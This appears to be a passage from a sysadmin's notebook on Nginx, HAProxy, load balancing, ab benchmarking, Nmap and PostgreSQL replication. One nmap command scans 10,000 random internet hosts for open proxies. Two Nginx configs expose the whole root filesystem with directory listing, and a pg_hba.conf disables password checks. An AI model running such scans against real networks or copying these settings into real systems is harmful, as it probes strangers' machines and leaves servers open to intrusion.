Simpler, being just a tcp proxy without an http implementation, which makes it faster and less bug prone

http://serverfault.com/questions/293501/should-nginx-be-at-the-front-of-haproxy-or-opposite
https://www.quora.com/Does-it-make-sense-to-put-Nginx-in-front-of-HAProxy
https://www.bizety.com/2016/01/27/haproxy-load-balancing-primer/
https://www.digitalocean.com/community/tutorials/how-to-create-a-high-availability-haproxy-setup-with-corosync-pacemaker-and-floating-ips-on-ubuntu-14-04
https://youtu.be/MKgJeqF1DHw

http://serverfault.com/questions/229945/what-are-the-differences-between-haproxy-and-ngnix-in-reverse-proxy-mode
http://serverfault.com/questions/204025/ordering-1-nginx-2-varnish-3-haproxy-4-webserver
http://nickcraver.com/blog/2016/02/17/stack-overflow-the-architecture-2016-edition/

36.1.15 Nginx vs Varnish

Varnish is an HTTP accelerator. You install it in front of your web application and it will speed it up significantly. Varnish stores data in virtual memory and leaves the task of deciding what is stored in memory and what gets paged out to disk to the operating system. This helps avoid the situation where the operating system starts caching data while it is moved to disk by the application.

Varnish is more advanced in terms of caching because Varnish caches whatever you tell it to cache. It can cache just the PHP output, just the static files, both, or neither. It's a very powerful tool. But Nginx is more suitable as a web server.

I'm a fan of haproxy -> Varnish -> app server, which we use heavily in our stack. haproxy provides ssl termination, websockets, and generally acts as a content router. Varnish is a caching reverse proxy which protects the app, handles TTL on content, etc. Lastly the app. It's a little complex, but the flexibility is amazing.

https://www.scalescale.com/tips/nginx/nginx-vs-varnish/
https://www.narga.net/varnish-nginx-comparison-nginx-alone-better/?PageSpeed=noscript
https://www.reddit.com/r/devops/comments/3d9tw6/should_there_be_only_1_reverse_proxy_nginx_or/

36.1.16 An Introduction to HAProxy and Load Balancing Concepts https://www.digitalocean.com/community/tutorials/an-introduction-to-haproxy-and-load-balancing-concepts

36.1.17 Redundant load balancers?

The point where the redundancy may fail is the load balancer itself. If you do not make that component redundant, the load balancer will become the single point of failure.

HA of a Load Balancer

An NGINX Plus HA cluster uses VRRP to manage a floating virtual IP address, ensuring that the IP address is always available and traffic is not dropped. The NGINX Plus high-availability solution is based on keepalived, which itself uses an implementation of the Virtual Router Redundancy Protocol (VRRP). After you install the nginx-ha-keepalived package and configure keepalived, it runs as a separate process on each NGINX instance in the cluster and manages a shared virtual IP address. The virtual IP address is the IP address advertised to downstream clients, for example via a DNS record for your service. Based on initial configuration, keepalived designates one NGINX instance as master and assigns the virtual IP address to it. The master periodically verifies that keepalived and NGINX Plus are both running, and sends VRRP advertisement messages at regular intervals to let the backup instance know it's healthy. If the backup doesn't receive three consecutive advertisements, it becomes the new master and takes over the virtual IP address.

https://en.wikipedia.org/wiki/Virtual_Router_Redundancy_Protocol
http://serverfault.com/questions/686878/how-to-make-redundant-load-balancers
http://d0.awsstatic.com/whitepapers/AWS_NGINX_Plus-whitepaper-final_v4.pdf
https://www.nginx.com/products/high-availability/
https://www.nginx.com/resources/admin-guide/nginx-ha-keepalived/
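As a rough illustration of the same idea with plain keepalived (not NGINX Plus), a minimal VRRP instance could look like the sketch below; the interface name, router id, priority and virtual IP are all assumptions for an example pair of nodes:

$ sudo apt-get install keepalived
$ sudo tee /etc/keepalived/keepalived.conf <<'EOF'
vrrp_instance VI_1 {
    state MASTER            # use BACKUP with a lower priority on the second node
    interface eth0          # interface that carries the virtual IP
    virtual_router_id 51
    priority 101
    advert_int 1
    virtual_ipaddress {
        192.168.1.100       # floating IP advertised to clients
    }
}
EOF
$ sudo service keepalived restart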


How To Set Up Highly Available Web Servers with Keepalived and Floating IPs on Ubuntu 14.04 https://www.digitalocean.com/community/tutorials/how-to-set-up-highly-available-web-servers-with-keepalived-and-floating-ips-on-ubuntu-14-04

How To Set Up Highly Available HAProxy Servers with Keepalived and Floating IPs on Ubuntu 14.04 https://www.digitalocean.com/community/tutorials/how-to-set-up-highly-available-haproxy-servers-with-keepalived-and-floating-ips-on-ubuntu-14-04

36.1.18 nginx automatic failover load balancing http://serverfault.com/questions/140990/nginx-automatic-failover-load-balancing

36.1.19 Building a Load Balancer with LVS - Linux Virtual Server http://kaivanov.blogspot.com/2013/01/building-load-balancer-with-lvs-linux.html

36.1.20 Building A Highly Available Nginx Reverse-Proxy Using Heartbeat http://opensourceforu.com/2009/03/building-a-highly-available-nginx-reverse-proxy-using-heartbeat/

36.1.21 Building a Highly-Available Load Balancer with Nginx and Keepalived on CentOS http://www.tokiwinter.com/building-a-highly-available-load-balancer-with-nginx-and-keepalived-on-centos/

36.1.22 HAProxy as a static reverse proxy for Docker containers http://oskarhane.com/haproxy-as-a-static-reverse-proxy-for-docker-containers/

36.1.23 How to setup HAProxy as Load Balancer for Nginx on CentOS 7 https://www.howtoforge.com/tutorial/how-to-setup-haproxy-as-load-balancer-for-nginx-on-centos-7/

36.1.24 Building a Load-Balancing Cluster with LVS http://dak1n1.com/blog/13-load-balancing-lvs/

36.1.25 Doing some local benchmark with Nginx

user nginx;
worker_processes 1;
worker_rlimit_nofile 5000;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 2048;
    use epoll;
    multi_accept on;
    accept_mutex on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    # access_log /var/log/nginx/access.log main;
    access_log off;

    sendfile on;
    #tcp_nopush on;

    keepalive_timeout 15;

    #gzip on;

    include /etc/nginx/conf.d/*.conf;

    server {
        server_name _;
        charset utf-8;
        client_max_body_size 50M;
        proxy_intercept_errors on;

        location / {
            autoindex on;
            alias /;
        }

        # Server status
        location = /status {
            stub_status on;
            allow all;
        }
    }
}

$ docker run --rm -p 80:80 -v ~/workspace/nginx/nginx.conf:/etc/nginx/nginx.conf:ro nginx
$ ab -n 150000 -c 20000 http://127.0.0.1/
$ ab -n 300000 -c 20000 http://127.0.0.1/
$ ab -k -n 5000000 -c 20000 http://127.0.0.1/
$ ab -k -c 10 -t 60 -n 10000000 http://127.0.0.1/


# worker_processes 1;
# worker_connections 1000;

# Failed requests: 0
$ ab -n 1000000 -c 1000 127.0.0.1/bin/tar

# Failed requests: 0
$ ab -n 1000000 -c 500 127.0.0.1/bin/tar

# Failed requests: 191
$ ab -n 1000000 -c 1000 127.0.0.1/bin/tar

# Failed requests: 77158
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

# Failed requests: 24346
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

# worker_processes 4;
# worker_connections 1000;

# Failed requests: 38067
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

# worker_processes 4;
# worker_connections 10000;

# Failed requests: 0
# Time per request: 0.509 [ms]
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

# worker_processes 1;
# worker_connections 10000;

# Failed requests: 0
# Time per request: 0.509 [ms]
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

# worker_processes 1;
# worker_connections 10000;

# Failed requests: 0
# Time per request: 0.509 [ms]
$ ab -n 100000 -c 20000 127.0.0.1/bin/tar

# worker_processes 1;
# worker_connections 10000;

# Failed requests: 0
# Time per request: 0.544 [ms]
$ ab -n 100000 -c 10000 127.0.0.1/bin/tar

Errors:

2016/05/04 10:57:09 [alert] 6#6: 1000 worker_connections are not enough
2016/05/04 11:39:44 [crit] 6#6: accept4() failed (24: Too many open files)

https://www.scalescale.com/tips/nginx/nginx-accept-failed-24-too-many-open-files/
http://www.cyberciti.biz/faq/linux-unix-nginx-too-many-open-files/
http://serverfault.com/questions/516802/too-many-open-files-with-nginx-cant-seem-to-raise-limit

36.1.26 apache benchmark

-c: ("Concurrency"). Indicates how many clients (people/users) will be hitting the site at the same time. While ab runs, there will be -c clients hitting the site. This is what actually decides the amount of stress your site will suffer during the benchmark.

-n: Indicates how many requests are going to be made. This just decides the length of the benchmark. A high -n value with a -c value that your server can support is a good idea to ensure that things don't break under sustained stress: it's not the same to support stress for 5 seconds as for 5 hours.

-k: This does the "KeepAlive" functionality browsers do by nature. You don't need to pass a value for -k as it is "boolean" (meaning: it indicates that you desire your test to use the Keep-Alive header from HTTP and sustain the connection). Since browsers do this and you're likely to want to simulate the stress and flow that your site will have from browsers, it is recommended you do a benchmark with this.

The final argument is simply the host. By default it will use the http:// protocol if you don't specify it.

http://stackoverflow.com/questions/12732182/ab-load-testing
http://serverfault.com/questions/274253/apache-ab-choosing-number-of-concurrent-connections
http://www.pinkbike.com/u/radek/blog/Apache-Bench-you-probably-are-using-the-t-timelimit-option-incor.html
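Putting those flags together, a typical invocation against a local server might look like this (the numbers are arbitrary examples):

# 10,000 requests, 100 concurrent clients, with HTTP keep-alive enabled
$ ab -n 10000 -c 100 -k http://127.0.0.1/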

"apr_socket_recv: Connection reset by peer (104)"

$ sudo /sbin/sysctl -a | grep net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_syn_backlog = 512

$ sudo /sbin/sysctl -a | grep net.core.somaxconn
net.core.somaxconn = 128

$ sudo /sbin/sysctl -w net.ipv4.tcp_max_syn_backlog=1024

$ sudo /sbin/sysctl -w net.core.somaxconn=256

http://stackoverflow.com/questions/30794548/about-the-concurrency-of-docker
http://blog.scene.ro/posts/apache-benchmark-apr_socket_recv/
https://easyengine.io/tutorials/php/fpm-sysctl-tweaking/
https://easyengine.io/tutorials/linux/sysctl-conf/
http://community.rtcamp.com/t/hitting-a-limit-with-the-tuning-or-am-i/831
http://serverfault.com/questions/231516/http-benchmarking
http://serverfault.com/questions/146605/understanding-this-error-apr-socket-recv-connection-reset-by-peer-104

The keepalive_timeout has nothing to do with the concurrent connections per second. In fact, nginx can close an idle connection at any time when it reaches the limit of worker_connections. What's really important is the connections that nginx cannot close: the active ones. How long a connection is active depends on the request processing time.


The approximate calculation looks like this:

worker_processes * worker_connections * K / average $request_time

where K is the average number of connections per request (for example, if you do proxy_pass, then nginx needs an additional connection to your backend).

http://nginx.org/en/docs/http/ngx_http_core_module.html#var_request_time
https://blog.martinfjordvald.com/2011/04/optimizing-nginx-for-high-traffic-loads/

Nginx as an HTTP server: max_clients = worker_processes * worker_connections
Nginx as a reverse proxy: max_clients = worker_processes * worker_connections / 4

https://loader.io/
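A quick back-of-the-envelope check of those formulas in the shell, assuming 4 worker processes and 10,000 worker connections:

# nginx as an HTTP server
$ echo $(( 4 * 10000 ))        # 40000 max clients
# nginx as a reverse proxy (the formula above divides by 4)
$ echo $(( 4 * 10000 / 4 ))    # 10000 max clients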

36.1.27 HTTP Keepalive Connections and Web Performance | NGINX

Modern web browsers typically open 6 to 8 keepalive connections and hold them open for several minutes before timing them out. Web servers may be configured to time these connections out and close them sooner.

If lots of clients use HTTP keepalives and the web server has a concurrency limit or scalability problem, then performance plummets once that limit is reached.

NGINX's HTTP-caching feature can cache responses from the upstream servers, following the standard cache semantics to control what is cached and for how long. If several clients request the same resource, NGINX can respond from its cache and not burden upstream servers with duplicate requests.

https://www.nginx.com/blog/http-keepalives-and-web-performance/
https://www.nginx.com/blog/tuning-nginx/

36.1.28 Nginx Caching

By default, NGINX respects the Cache-Control headers from origin servers. It does not cache responses with Cache-Control set to Private, No-Cache, or No-Store or with Set-Cookie in the response header. NGINX only caches GET and HEAD client requests.

https://www.nginx.com/resources/wiki/start/topics/examples/reverseproxycachingexample/
https://www.nginx.com/blog/nginx-caching-guide/

36.1.29 Optimizing NGINX Speed for Serving Content

https://www.nginx.com/resources/admin-guide/serving-static-content/
http://stackoverflow.com/questions/4839039/tuning-nginx-centos-for-server-lots-of-static-content
http://blog.octo.com/en/http-caching-with-nginx-and-memcached/
https://github.com/bpaquet/ngx_http_enhanced_memcached_module


36.1.30 Fastest server for static files serving

http://gwan.com/benchmark
http://www.wikivs.com/wiki/G-WAN_vs_Nginx

Mount your document root as a ramdisk.
Cache full responses to the most common queries rather than rebuilding them.
Tweaking swappiness (or having no swap at all)
Firewall load balancing
DNS load balancing
Geolocation load balancing
Turning off logging/hostname resolution/various lookups
Many cores, big pipes
Mounting the file system with noatime

http://stackoverflow.com/questions/13554706/fastest-server-for-static-files-serving
http://serverfault.com/a/443633
https://nbonvin.wordpress.com/2011/03/24/serving-small-static-files-which-server-to-use/
https://github.com/eucalyptus/architecture/blob/master/features/elb/3.3/elb-benchmark.wiki

36.1.31 Sample Nginx load balancing

nginx_lb:

user nginx;
worker_processes 1;
worker_rlimit_nofile 100000;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
    use epoll;
    multi_accept on;
    accept_mutex on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"'
                    '$request_time';

    access_log off;

    sendfile on;

    keepalive_timeout 15;

    aio on;
    directio 4m;
    tcp_nopush on;
    tcp_nodelay on;

    upstream web_server {
        server 192.168.1.119:81;
        server 192.168.1.119:82;
    }

    server {
        server_name _;
        charset utf-8;
        client_max_body_size 50M;
        proxy_intercept_errors on;
        # proxy_max_temp_file_size 0;

        location / {
            proxy_pass http://web_server;
        }

        # Server status
        location = /status {
            stub_status on;
            allow all;
        }
    }

    include /etc/nginx/conf.d/*.conf;
}

nginx_cdn:

user nginx;
worker_processes 1;
worker_rlimit_nofile 100000;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
    use epoll;
    multi_accept on;
    accept_mutex on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"'
                    '$request_time';

    # access_log /var/log/nginx/access.log main;
    access_log off;

    sendfile on;

    keepalive_timeout 15;

    gzip on;

    aio on;
    directio 4m;
    tcp_nopush on;
    tcp_nodelay on;

    server {
        server_name _;
        charset utf-8;
        client_max_body_size 50M;
        proxy_intercept_errors on;

        location / {
            autoindex on;
            alias /;
        }

        location = /status {
            stub_status on;
            allow all;
        }
    }

    include /etc/nginx/conf.d/*.conf;
}


CHAPTER 37

Nmap

Contents:

37.1 Scan Options

37.1.1 Find open Proxies

# nmap -iR 10000 -sS -p8000,8080,8123,8181,3128,1080 -PS8000,8080,8123,8181,3128,1080 -n --script=http-open-proxy,socks-open-proxy --open -v
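Once the scan reports an open proxy, you can double-check it by pushing a request through it with curl; the address below is only a documentation placeholder:

# fetch headers of an external site through the candidate HTTP proxy
$ curl -I -x http://203.0.113.10:8080 http://example.com/
# same idea for a SOCKS proxy
$ curl -I --socks5 203.0.113.10:1080 http://example.com/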


CHAPTER 38

NodeJS

Contents:

38.1 Tips

38.1.1 run npm command gives error “/usr/bin/env: node: No such file or directory”

$ ln -s /usr/bin/nodejs /usr/bin/node

https://github.com/nodejs/node-v0.x-archive/issues/3911

38.1.2 Grunt “Command Not Found” Error in Terminal

$ npm install -g grunt-cli


CHAPTER 39

Notes

Contents:

39.1 Tips

39.2 Terminology

Internationalization: Preparing the software for localization. Usually done by developers.
Localization: Writing the translations and local formats. Usually done by translators.

39.3 Bookmarks

39.3.1 Decoder http://www.showmycode.com/

39.3.2 Dns Online Tools

http://viewdns.info/
http://whois.nic.ir/Query_Whois_Server
http://www.dnsinspect.com/


39.3.3 Online Virus Check

http://www.virscan.org/
https://www.virustotal.com/en/
https://www.metascan-online.com/
http://virusscan.jotti.org/en

39.3.4 Browser Security Check

http://www.pcflank.com/index.htm
http://www.browserleaks.com/
https://browsercheck.qualys.com/
http://www.browserscope.org/
https://panopticlick.eff.org/
https://www.grc.com/x/ne.dll?bh0bkyd2
http://www.enhanceie.com/test/clickjack/
http://deaduseful.com/browsercheck/
https://www.ssllabs.com/ssltest/viewMyClient.html
http://detectmybrowser.com/
http://browserspy.dk/fonts-flash.php

39.3.5 Temporary Email Address

http://temp-mail.org/
https://www.guerrillamail.com/inbox?mail_id=1
http://10minutemail.com/10MinuteMail/index.html

39.3.6 Css compressor http://www.lotterypost.com/css-compress.aspx

39.3.7 Online compiler and executable for codes http://www.compileonline.com/

39.3.8 Character references http://dev.w3.org/html5/html-author/charref


39.3.9 Malware Analysis for Unknown Binaries

https://anubis.iseclab.org/
http://jevereg.amnpardaz.com/

39.3.10 Blog security http://expertmiami.blogspot.de/

39.3.11 Online device search engine https://www.shodan.io

39.3.12 Online Pentest Tools https://pentest-tools.com/home

39.3.13 Robtex Swiss Army Knife Internet Tool https://www.robtex.com/


CHAPTER 40

Perl

Contents:

40.1 Tips

40.1.1 Install Module

# perl -MCPAN -e shell
cpan[1]> install String::Random


CHAPTER 41

Piano

Contents:

41.1 Tips

41.1.1 Setting up Virtual MIDI Piano Keyboard in Ubuntu

$ sudo apt-get install vmpk vkeybd $ sudo apt-get install amsynth $ sudo apt-get install qjackctl

After installing the above packages we need to connect vmpk with amsynth through qjackctl, because vmpk doesn't produce sound by itself. Launch Vmpk, Amsynth and Qjackctl one by one, then make these MIDI connections:

vmpk output > vmpk input
vmpk output > amsynth MIDI IN

https://sathisharthars.com/2014/03/01/setting-up-virtual-midi-piano-keyboard-in-ubuntu/
https://www.youtube.com/watch?v=827jmswqnEA
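If you prefer the command line over the qjackctl GUI, the same wiring can usually be done with aconnect from alsa-utils; the client names below are assumptions and may differ on your system, so list the ports first:

# list ALSA MIDI input/output ports
$ aconnect -lio
# connect VMPK's output port to amsynth's MIDI input (names and port numbers are examples)
$ aconnect 'VMPK Output':0 'amsynth':0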


CHAPTER 42

PostgreSQL

Contents:

42.1 Tips

42.1.1 fix psql: FATAL: role “” does not exist error

$ psql
psql: FATAL: role "" does not exist

$ sudo adduser postgres
$ sudo passwd postgres

$ su - postgres
postgres@local:~$ psql
psql (9.1.13)
Type "help" for help.
postgres=#

42.1.2 List all databases

$ su - postgres
postgres@local:~$ psql
postgres=# \list    # or \l
                              List of databases
   Name    |  Owner   | Encoding  | Collate | Ctype |   Access privileges
-----------+----------+-----------+---------+-------+-----------------------
 postgres  | postgres | SQL_ASCII | C       | C     |
 template0 | postgres | SQL_ASCII | C       | C     | =c/postgres          +
           |          |           |         |       | postgres=CTc/postgres
 template1 | postgres | SQL_ASCII | C       | C     | =c/postgres          +
           |          |           |         |       | postgres=CTc/postgres
(3 rows)

postgres=#

42.1.3 list user accounts

$ su - postgres
postgres@local:~$ psql
postgres=# \du
                             List of roles
 Role name |                   Attributes                   | Member of
-----------+------------------------------------------------+-----------
 postgres  | Superuser, Create role, Create DB, Replication | {}

postgres=#

42.1.4 CREATE Database

$ su - postgres
postgres@local:~$ psql
postgres=# CREATE DATABASE testdb;

42.1.5 Add or create a user account and grant permission for database

$ su - postgres
postgres@local:~$ psql
postgres=# CREATE USER <user_name> WITH PASSWORD '<password>';
postgres=# CREATE DATABASE test_db;
postgres=# GRANT ALL PRIVILEGES ON DATABASE test_db to <user_name>;
postgres=# \q

42.1.6 Get the Size of a Postgres Table

postgres@ubuntu:~$ psql -d database_name -c "select pg_size_pretty(pg_relation_size('table_name'));"
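The same pattern works for a whole database with pg_database_size; a small sketch reusing the database name from the example above:

# pretty-printed total size of the database on disk
postgres@ubuntu:~$ psql -d database_name -c "select pg_size_pretty(pg_database_size('database_name'));"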


42.1.7 Quit from psql

postgres=# \q
postgres@83abf5fff8e0:~$ whoami
postgres

42.1.8 Connect to postgres from bash

In root bash:

$ su - postgres
$ psql

Or:

$ sudo -u postgres psql

42.1.9 Allow localhost to connect to postgres without password checking

# vim /etc/postgresql/9.4/main/pg_hba.conf

# "local" is for Unix domain socket connections only local all all trust # peer # IPv4 local connections: host all all 127.0.0.1/32 trust # md5 # IPv6 local connections: host all all ::1/128 trust # md5

42.1.10 Postgres on Docker

$ docker pull postgres

$ docker run --name postgres-01 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=postgres postgres

Expose Ports: 5432
Data Directories: /var/lib/postgresql/data/
https://hub.docker.com/_/postgres/
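A minimal sketch of publishing the port and connecting from the host with psql; the container name and password are arbitrary examples:

$ docker run --name postgres-02 -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres
# connect from the host (the psql client must be installed locally)
$ psql -h 127.0.0.1 -p 5432 -U postgres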

Warm Standby

It was introduced in PostgreSQL 8.3 (IIRC).

1. It is based on WAL log shipping, which typically means WAL archives generated on the Master will be transferred and applied at the Standby side. So the Warm Standby always waits for the WAL archive in which the Master is currently writing, and keeps throwing messages like "cp: cannot stat : No such file or directory". So it is always one archive behind the Master and data loss will be at most 16MB (assuming a healthy warm standby :-) )

2. In the postgresql.conf file, you would need to change just three parameters on the master: wal_level to archive, archive_mode and archive_command; nothing changes in the postgresql.conf file on the standby side.

On Master:

wal_level = archive
archive_mode = on
archive_command = 'cp %p /path_to/archive/%f'

3. In the recovery.conf file, three parameters: standby_mode, restore_command and trigger_file.

4. You cannot connect to the Standby, so the database is not even open for read operations (read operations are not permitted on the db).

Detailed explanation and related docs are here: http://wiki.postgresql.org/wiki/Warm_Standby

Hot Standby

It was introduced in PostgreSQL 9.0.

1. It is also based on WAL log shipping (same as warm standby). And of course, WALs will be transferred and applied at the Standby, so it is one WAL behind and always waits for the WAL archive in which the Master is currently writing.

2. In the postgresql.conf file, you would need to change wal_level to hot_standby, archive_mode and archive_command. Since you'll likely want to use pg_basebackup you should also set max_wal_senders to at least 2 or 3. And hot_standby = on in the standby conf file.

On Master:

wal_level = hot_standby
max_wal_senders = 5
wal_keep_segments = 32
archive_mode = on
archive_command = 'cp %p /path_to/archive/%f'

On Slave:

hot_standby = on

3. In the recovery.conf file, three parameters: standby_mode, restore_command and trigger_file.

4. You can connect to the Standby for read queries (you should set hot_standby to ON in the standby postgresql.conf file).

Detailed explanation and related docs are here: http://wiki.postgresql.org/wiki/Hot_Standby

Streaming Replication

It was introduced in PostgreSQL 9.0.

1. XLOG records generated in the primary are periodically shipped to the standby via the network. XLOG records shipped are replayed as soon as possible, without waiting until the XLOG file has been filled. The combination of Hot Standby and SR makes the latest data inserted into the primary visible in the standby almost immediately. So minimal data loss (almost only open transactions will be lost if it is async replication, 0 loss if it is sync replication).

2. In the postgresql.conf file, this time 5 parameters, streaming related params like below.

On Master:

wal_level = hot_standby
max_wal_senders = 5
wal_keep_segments = 32
archive_mode = on
archive_command = 'cp %p /path_to/archive/%f'

On Slave:

hot_standby = on

3. In the recovery.conf file, you would need one extra parameter in addition to the three which you add for hot/warm standby, i.e. primary_conninfo, so below are four parameters:

standby_mode = 'on'
primary_conninfo = 'host=192.168.0.10 port=5432 user=postgres'
trigger_file = '/path_to/trigger'
restore_command = 'cp /path_to/archive/%f "%p"'

4. You can connect to the Standby for read queries (you should set hot_standby to ON in the standby postgresql.conf file).

Detailed explanation and related docs are here:
http://wiki.postgresql.org/wiki/Streaming_Replication
http://bajis-postgres.blogspot.in/2013/12/step-by-step-guide-to-setup-steaming.html
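Once streaming replication is up, you can verify it from the shell; these queries use the 9.x view and function names that match the versions discussed here:

# on the master: one row per connected standby
$ sudo -u postgres psql -c "SELECT client_addr, state, sent_location, replay_location FROM pg_stat_replication;"
# on the standby: returns 't' while it is replaying WAL
$ sudo -u postgres psql -c "SELECT pg_is_in_recovery();"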

42.1.11 Difference between Warm, hot standby and Streaming Replication: http://bajis-postgres.blogspot.com/2014/04/difference-between-warm-hot-standby-and.html

42.1.12 Zero to PostgreSQL streaming replication in 10 mins

http://www.rassoc.com/gregr/weblog/2013/02/16/zero-to-postgresql-streaming-replication-in-10-mins/
https://wiki.postgresql.org/wiki/Binary_Replication_Tutorial
http://dba.stackexchange.com/questions/58960/configure-postgresql-recovery-again-to-be-slave
http://evol-monkey.blogspot.com/2014/01/setting-up-postgres-automated-failover.html
http://www.repmgr.org/

42.1.13 Understanding and controlling crash recovery

If PostgreSQL crashes there will be a message in the server log with severity-level PANIC. PostgreSQL will immediately restart and attempt to recover using the transaction log or Write Ahead Log (WAL). The WAL consists of a series of files written to the pg_xlog subdirectory of the PostgreSQL data directory. Each change made to the database is recorded first in WAL, hence the name “write-ahead” log. When a transaction commits, the default and safe behavior is to force the WAL records to disk. If PostgreSQL should crash, the WAL will be replayed, which returns the database to the point of the last committed transaction, and thus ensures the durability of any database changes. Note that the database changes themselves aren’t written to disk at transaction commit. Those changes are written to disk sometime later by the “background writer” on a well-tuned server.

Crash recovery replays the WAL, though from what point does it start to recover? Recovery starts from points in the WAL known as “checkpoints”. The duration of crash recovery depends upon the number of changes in the transaction log since the last checkpoint. A checkpoint is a known safe starting point for recovery, since at that time we write all currently outstanding database changes to disk. A checkpoint can become a performance bottleneck on busy database servers because of the number of writes required. There are a number of ways of tuning that, though please also understand the effect on crash recovery that those tuning options may cause.

Two parameters control the amount of WAL that can be written before the next checkpoint. The first is checkpoint_segments, which controls the number of 16 MB files that will be written before a checkpoint is triggered. The second is time-based, known as checkpoint_timeout, and is the number of seconds until the next checkpoint. A checkpoint is called whenever either of those two limits is reached. It’s tempting to banish checkpoints as much as possible by setting the following parameters:

checkpoint_segments = 1000
checkpoint_timeout = 3600

though if you do, you might give some thought to how long the recovery will be and whether you want that. Also, you should make sure that the pg_xlog directory is mounted on disks with enough disk space for at least 3 x 16 MB x checkpoint_segments. Put another way, you need at least 32 GB of disk space for checkpoint_segments = 1000. If wal_keep_segments > 0 then the server can also use up to 16 MB x (wal_keep_segments + checkpoint_segments).

Recovery continues until the end of the transaction log. We are writing this continually, so there is no defined end point; it is literally the last correct record. Each WAL record is individually CRC checked, so we know whether a record is complete and valid before trying to process it. Each record contains a pointer to the previous record, so we can tell that the record forms a valid link in the chain of actions recorded in WAL. As a result of that, recovery always ends with some kind of error reading the next WAL record. That is normal.

Recovery performance can be very fast, though it does depend upon the actions being recovered. The best way to test recovery performance is to set up a standby replication server, described in the chapter on Replication.

http://www.treatplanner.com/docs/PostgreSQL-9-Admin-Cookbook-eBook16112010_1048648.pdf
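As a rough illustration of the trade-off described above, a minimal postgresql.conf sketch (the values are only examples; checkpoint_segments applies to PostgreSQL 9.4 and earlier, newer releases replaced it with max_wal_size):

checkpoint_segments = 64     # 16 MB WAL files between checkpoints; needs roughly 3 x 64 x 16 MB free in pg_xlog
checkpoint_timeout = 15min   # also force a checkpoint at least every 15 minutes

Larger values mean fewer, cheaper checkpoints but a longer crash recovery; smaller values mean the opposite.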

42.1.14 Synchronous Replication

PostgreSQL streaming replication is asynchronous by default. If the primary server crashes then some transactions that were committed may not have been replicated to the standby server, causing data loss. The amount of data loss is proportional to the replication delay at the time of failover.

http://www.postgresql.org/docs/9.4/static/warm-standby.html

If data changes are acknowledged as sent from Master to Standby before transaction commit is acknowledged, we refer to that as synchronous replication. If data changes are sent after a transaction commits, we name that asynchronous replication. With synchronous replication, the replication delay directly affects performance on the Master. With asynchronous replication the Master may continue at full speed, though this opens up a possible risk that the Standby may not be able to keep pace with the Master. All asynchronous replication must be monitored to ensure that a significant lag does not develop, which is why we must be careful to monitor the replication delay.

http://www.treatplanner.com/docs/PostgreSQL-9-Admin-Cookbook-eBook16112010_1048648.pdf

Checkpoints are points in the sequence of transactions at which it is guaranteed that the heap and index data files have been updated with all information written before that checkpoint. At checkpoint time, all dirty data pages are flushed to disk and a special checkpoint record is written to the log file. (The change records were previously flushed to the WAL files.) In the event of a crash, the crash recovery procedure looks at the latest checkpoint record to determine the point in the log (known as the redo record) from which it should start the REDO operation. Any changes made to data files before that point are guaranteed to be already on disk. Hence, after a checkpoint, log segments preceding the one containing the redo record are no longer needed and can be recycled or removed. (When WAL archiving is being done, the log segments must be archived before being recycled or removed.)

http://www.postgresql.org/docs/9.3/static/wal-configuration.html

Postgres was designed with ACID properties in mind. This is reflected in the way it works and stores data, at the core of which is the Write-Ahead Log (WAL). Amongst other things, the WAL allows for atomic transactions and data-safety in the face of a crash.

http://www.anchor.com.au/documentation/better-postgresql-backups-with-wal-archiving/

wal_level determines how much information is written to the WAL. The default value is minimal, which writes only the information needed to recover from a crash or immediate shutdown. archive adds logging required for WAL archiving; hot_standby further adds information required to run read-only queries on a standby server; and, finally, logical adds information necessary to support logical decoding. Each level includes the information logged at all lower levels. This parameter can only be set at server start.

http://www.postgresql.org/docs/9.4/static/runtime-config-wal.html#GUC-WAL-LEVEL
http://www.anchor.com.au/documentation/better-postgresql-backups-with-wal-archiving/
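For the synchronous case, a minimal configuration sketch (assuming a single standby whose primary_conninfo sets application_name=standby1; the name and values are only illustrative):

# postgresql.conf on the master
synchronous_standby_names = 'standby1'   # commits wait for this standby to confirm
synchronous_commit = on

With this in place, a commit on the master only returns once standby1 has flushed the WAL, trading commit latency for zero data loss on failover.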

42.1.15 When will PostgreSQL execute archive_command to archive wal files?

The archive command is executed every time it switches the archive log to a new one. Which as you say can be triggered manually by calling the pg_switch_xlog() function. Other than that, an archive log needs to be changed to a new one when it is full, which by default is when it reaches 16MB, but can be changed at compile time. You can also specify a timeout value using the parameter archive_timeout which will execute the command after the set amount of seconds, which is useful for databases that have low activity.

http://dba.stackexchange.com/questions/51578/when-will-postgresql-execute-archive-command-to-archive-wal-files
http://www.postgresql.org/docs/current/static/continuous-archiving.html#BACKUP-SCRIPTS
http://thedulinreport.com/2015/01/31/configuring-master-slave-replication-with-postgresql/

The two important options for dealing with the WAL for streaming replication: wal_keep_segments should be set high enough to allow a slave to catch up after a reasonable lag (i.e. high update volume, slave being offline, etc.). archive_mode enables WAL archiving which can be used to recover files older than wal_keep_segments provides. The slave servers simply need a method to retrieve the WAL segments. NFS is the simplest method, but anything from scp to http to tapes will work so long as it can be scripted.

# on master
archive_mode = on
archive_command = 'cp %p /path_to/archive/%f'
# on slave
restore_command = 'cp /path_to/archive/%f "%p"'

